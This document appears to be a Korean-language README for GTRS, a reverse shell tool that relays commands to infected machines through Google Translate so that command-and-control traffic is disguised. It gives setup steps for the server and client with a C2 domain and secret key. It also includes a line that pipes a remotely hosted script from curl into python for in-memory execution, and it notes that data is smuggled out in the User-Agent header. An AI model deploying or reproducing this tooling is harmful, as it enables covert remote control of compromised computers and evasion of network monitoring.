
GTRS - 구글 번역기 리버스 셸
이 도구는 Google 번역기를 프록시로 사용하여 감염된 머신에 임의 명령을 보냅니다.
[INFECTED MACHINE] ==HTTPS==> [GOOGLE TRANSLATE] ==HTTP==> [C2]
먼저 VPS와 도메인이 필요합니다. 도메인은 Freenom에서 무료로 얻을 수 있습니다.
VPS에서 server.py를 시작합니다.
python2.7 server.py
Server running on port: 80
Secret Key: e294a11e-bb6f-49ed-b03a-9ec42be55062
서버는 클라이언트에서 사용될 비밀 키를 제공합니다.
Google 번역기에 접근 가능한 컴퓨터에서 클라이언트를 실행하고, 도메인과 서버가 생성한 비밀 키를 제공합니다.
bash client.sh www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
이제 named pipe 파일을 사용한 대화형 셸을 사용할 수 있습니다. 네 디렉터리로 cd할 수 있습니다.
먼저 바이너리를 다운로드하거나 컴파일한 후, bash 클라이언트와 동일한 과정을 따릅니다.
./client_Linux www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
이 클라이언트를 사용하면 Linux, Mac 및 Windows에서 실행할 수 있지만, 아직 대화형 셸은 지원되지 않습니다.
이 블로그 포스트를 읽은 후, GTRS를 메모리에서 실행하기 위한 간단한 변형을 만들었습니다. 스크립트 inmemory-linux.py에서 호스트와 키를 편집한 후 서버에 호스팅하고 curl로 가져오면 됩니다.
curl https://yourserver.ml/inmemory-linux.py | python
또는 youtube 접근 방식을 사용하여 스크립트를 호스팅할 수 있습니다.
CODE_IS_CHEAP_SHOW_ME_THE_DEMO
.bashrc와 같은 큰 파일을 읽지 못할 수 있습니다.User-Agent 헤더를 사용하여 데이터를 보내는 방식으로 문제 해결됨.libxml2-utils에 포함된 xmllint를 설치해야 합니다.문제 해결됨, 이제 클라이언트는 Go로도 작성되었습니다.